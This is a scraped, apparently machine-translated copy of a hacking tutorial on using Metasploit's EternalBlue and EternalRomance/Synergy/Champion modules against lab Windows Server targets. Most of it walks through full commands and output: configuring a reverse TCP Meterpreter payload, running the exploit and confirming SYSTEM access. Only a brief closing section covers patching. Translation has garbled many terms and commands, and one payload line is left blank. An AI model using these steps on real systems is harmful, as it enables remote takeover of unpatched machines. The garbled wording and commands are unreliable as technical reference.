قالب وردپرس درنا توس
Home / Tips and Tricks / How to use EternalBlue on Windows Server with Metasploit «Zero Byte :: WonderHowTo

How to use EternalBlue on Windows Server with Metasploit «Zero Byte :: WonderHowTo



Particular vulnerabilities and exploits come out and create headlines with their catchy name and impressive potential for damage. EternalBlue is one of these exploits. Originally attached to the NSA, this null day exploited an error in the SMB protocol, which affected many Windows machines and caused abuse everywhere. Here we will use EternalBlue to utilize SMB via Metasploit.

What is EternalBlue?

EternalBlue is an exploitation that is likely to have been developed by NSA as a former null day. It was released in 201

7 by Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which have possible ties to the NSA's tailor-made Access Operations unit.

EternalBlue, also known as MS17-010, is a vulnerability in Microsoft's Server Message Block (SMB) protocol. SMBs allow systems to share access to files, printers, and other resources on the network. The vulnerability may occur because earlier versions of the SMB include an error that allows an attacker to establish a zero session connection via anonymous login. An attacker can then send erroneous packets and finally execute arbitrary commands on the target.

EternalBlue was primarily responsible for WannaCry, NotPetya and BadRabbit ransomware outbreaks, as well as the EternalRocks mask.

Option 1: Use EternalBlue with Metasploit

We use a repackaged copy of Windows Server 2008 R2 as the target for the first part of this tutorial. An evaluation copy can be downloaded from Microsoft so that you can better follow.

Step 1: Find a module to use

The first thing we need to do is open the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not already running, followed by msfconsole .

  service postgresql start
msfconsole 

Then use the search command within the Metasploit to find a suitable module to use.

  search eternalblue 
  Matching modules
================

Name Disclosure Date Rank Check Description
------------------ -----------
extra / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote control Windows Command Execution
help / scanner / smb / smb_ms17_010 normal Yes MS17-010 SMB RCE detection
explode / windows / smb / ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote control Windows Kernel Pool Corruption
explode / windows / smb / ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote control Windows Kernel Pool Corruption for Win8 +
explode / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution 

There is a help scanner that we can run to determine if a target is vulnerable to MS17-010 . It is always a good idea to do the necessary reconstruction like this. Otherwise, you can stop wasting a lot of time if the target is not even vulnerable.

Once we have decided that our goal is really vulnerable to EternalBlue, we can use the following utilization module from

  Using exploit / windows / smb / ms17_010_eternalblue 

You know you are good if you see "the prompt (windows / smb / ms17_010_eternalblue)".

Step 2: Run the module

Options

  Module options (exploit / windows / smb / ms17_010_eternalblue):

Name Current setting Mandatory Description
---- --------------- -------- -----------
RHOSTS yes Target address range or CIDR identifier
RPORT 445 yes Target port (TCP)
SMBDomain. no (optional) Windows domain to use for authentication
SMBPass No (Optional) The password for the specified user name
SMBUser no (Optional) The username to verify as
VERIFY_ARCH true yes Check if remote architecture matches use Target.
VERIFY_TARGET true yes Check if remote operating system matches exploit Target.

Utnyttjemål:

Id Name
- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs 

First, we need to enter the target's IP address.

  set rhosts 10.10.0.101 
  rhosts => 10.10.0.101 

Next, we can load the trustworthy reverse_tcp shell as the payload.

  Enter payload window / x64 / meterpreter / reverse_tcp 
  payload => windows / x64 / meterpreter / reverse_tcp 

Finally

  set lhost 10.10.0.1 
  lhost => 10.10.0.1 

And the listening port to a suitable number.

  set lport 4321 
  lport => 4321 

It should be all, so the only thing that remains is to launch the exploitation. Use the command to run it .

  run 
  [*] Started reverse TCP manager at 10.10.0.1:4321
[*] 10.10.0.101:445 - Connection to goals for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected for OS specified by SMB response
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.10.0.101:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030 6b 20 31 k 1
[+] 10.10.0.101:445 - Target arc selected for arc indicated by DCE / RPC response
[*] 10.10.0.101:445 - Trying to utilize 12 Groom Allocations.
[*] 10.10.0.101:445 - Sends everything but the last fragment of the exploit package
[*] 10.10.0.101:445 - Start non-paged pool grooming
[+] 10.10.0.101:445 - Send SMBv2 buffers
[+] 10.10.0.101:445 - Terminating SMBv1 connection creates free holes in connection with SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sends the last fragment of the exploit package!
[*] 10.10.0.101:445 - Receiving response from exploitation package
[+] 10.10.0.101:445 - ETERNALBLUE write written ready (0xC000000D)!
[*] 10.10.0.101:445 - Send eggs to damaged connection.
[*] 10.10.0.101:445 - Release from damaged buffer.
[*] Transmission steps (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

meterpreter> 

We see that some things happen here, such as the SMB connection being established and the exploitation package being sent. Finally we see a "WIN" and a Meterpreter session opens. Sometimes this exploitation will not be successfully completed the first time, so if it doesn't just try again and it will go through.

Step 3: Verify the goal is compromised

We can verify that we have compromised the target by running commands like sysinfo to obtain operating system information.

  sysinfo 
  Computer: SO2
OS: Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture: x64
System Language: en_US
Domain: DLAB
Log in to users: 2
Meterpreter: x64 / windows 

and getuid to get the current username.

  getuid 
  Server username: NT AUTHORITY SYSTEM 

This exploitation does not work well on new systems, and in some cases it may crash the target machine.

Option 2: EternalRomance / EternalSynergy / EternalChampion

As if EternalBlue was not devastating enough, three more similar exploits developed after that. EternalRomance and EternalSynergy utilize a type of confusion (CVE-2017-0143), while EternalChampion and EternalSynergy utilize a competitive relationship (CVE-2017-0146).

These were combined in a single Metasploit module that also uses the classic psexec payload. It is considered more reliable than EternalBlue, less likely to crash the target, and works on all newly unmatched versions of Windows, up to Server 2016 and Windows 10.

The only approach is that this exploits requires a named tube. Named tubes provide a method for running processes to communicate with each other, usually as a file for other processes to be attached. The Metasploit module automatically checks for named tubes, making it quite easy to use as long as a named tube is present on the target.

Step 1: Finding a Vulnerable Goal

We can use Nmap as an alternative to the Metasploit scanner to discover if a target is vulnerable to EternalBlue. Nmap Scripting Engine is a powerful feature of the core tool that allows all types of scripts to run towards a target.

Here we use the script smb-vuln-ms17-010 to check for the vulnerability. Our goal will be a repackaged copy of the Windows Server 2016 Datacenter release. Evaluation copies can be downloaded from Microsoft so you can follow if you want.

We can enter a single script to run with the – script option along with -v flag for verbosity and our target's IP address. First change directories if you are still running Metasploit.

  CD
nmap - script smb-vuln-ms17-010 -v 10.10.0.100 

Nmap starts and should not take too long because we just run a script. At the end of the exit we find the results.

  Start Nmap 7.70 (https://nmap.org) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scan.
Initiation of NSE at 11:05

...

Host script results:
| smb vuln-ms17-010:
| VULNERABLE:
| External code execution security in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| ID: CVE: CVE-2017-0143
| Risk factor: HIGH
| There is a vulnerable remote security code in Microsoft SMBv1
| servers (ms17-010).
|
| Entry date: 2017-03-14
| references:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| _ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Mail Scanning.
Initiation of NSE at 11:05
Completed NSE at 11:05, past 0.00
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned for 2.31 seconds
Raw package sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB) 

We can see it listing the target as vulnerable, along with additional information such as risk factors and links to CVE.

Step 2: Find a module to use

Now that we know the goal is vulnerable, we can go back to the Metasploit and search for an appropriate utilization.

  msfconsole
search for eternity 
  Matching modules
================

Name Disclosure Date Rank Check Description
------------------ -----------
extra / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote control Windows Command Execution
explode / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution 

And load the module in Metasploit with the command used .

  Using exploit / windows / smb / ms17_010_psexec 

You know you're good if you look "fast (Windows / smb / ms17_010_psexec)".

Step 3: Run the module

Let's take a look at our options:

  options 
  Module options (exploit / windows / smb / ms17_010_psexec):

Name Current setting Mandatory Description
---- --------------- -------- -----------
DBGTRACE false yes Display additional troubleshooting information
LEAKATTEMPTS 99 yes How many times do you try to leak the transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named tubes to check
RHOSTS yes Target address range or CIDR identifier
RPORT 445 yes Target port
SERVICE_DESCRIPTION no Service description for use on goals for fine listing
SERVICE_DISPLAY_NAME no Service Display Name
SERVICE_NAME no The service name
SHARE ADMIN $ yes The part to be connected to can be an admin file (ADMIN $, C $, ...) or a common read / write folder share
SMBDomain. no Windows domain to use for authentication
SMBPass no Password for the specified username
SMBUser no The username to verify as

Utnyttjemål:

Id Name
- ----
0 Automatic 

It seems that this uses a list of named pipes to control and connect to some. We can leave all of this as standard for now, but we have to set up remote hosts.

  set rhosts 10.10.0.100 
  rhosts => 10.10.0.100 

And the payload of the reverse shell.

  set payload 

and local host port.

  set lport 4321 
  lport => 4321 

We should be good to go now. Type to run to start exploit.

  run 
  [*] Started reverse TCP manager at 10.10.0.1:4321
[*] 10.10.0.100:445 - Goal OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-was primitive ...
[+] 10.10.0.100:445 - Write over ... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selects PowerShell targets
[*] 10.10.0.100:445 - Implementation of payload ...
[+] 10.10.0.100:445 - Service is started, OK if you are running a command or not executable ...
[*] Transmission steps (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1: 4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500 

We can see the payload manages to implement, and we end up with a meter session.

Step 4: Verify the goal is compromised

Again, we can verify that we have compromised the system with commands like sysinfo .

  sysinfo 
  Computer: DC01
OS: Windows 2016 (Build 14393).
Architecture: x64
System Language: en_US
Domain: DLAB
Log in to users: 4
Meter preter: x64 / windows 

and getuid .

  getuid 
  Server username: NT AUTHORITY SYSTEM 

Preventive and current status

Despite all the damage EternalBlue has caused is a reliable way to prevent these types of exploits: patch your systems! At this point, almost two years since these vulnerabilities were revealed, there is really no excuse for having outdated operating systems.

However, EternalBlue continues to be a problem, and although the consequences are ugly, unfortunately some organizations will still run unread systems. That, combined with pirate versions of Windows, makes EternalBlue an important threat to this day.

Cryptojacking, which uses a victim's computer secretly my cryptocurrency, is another threat vector that uses EternalBlue to claim attacks. WannaMine was one of those outbreaks that hijacked computers around the world in 2018.

Wrapping Up

Today we learned about EternalBlue and how we use it with Metasploit. We also learned about an exploitation that is similar to EB which is more reliable and works with more systems. In the next tutorial we will dig a little deeper and learn how to utilize EternalBlue manually, which is much more satisfactory in the end.

Cover image of Fancycrave / Pexels; Screenshots of drd_ / Zero Byte

Source link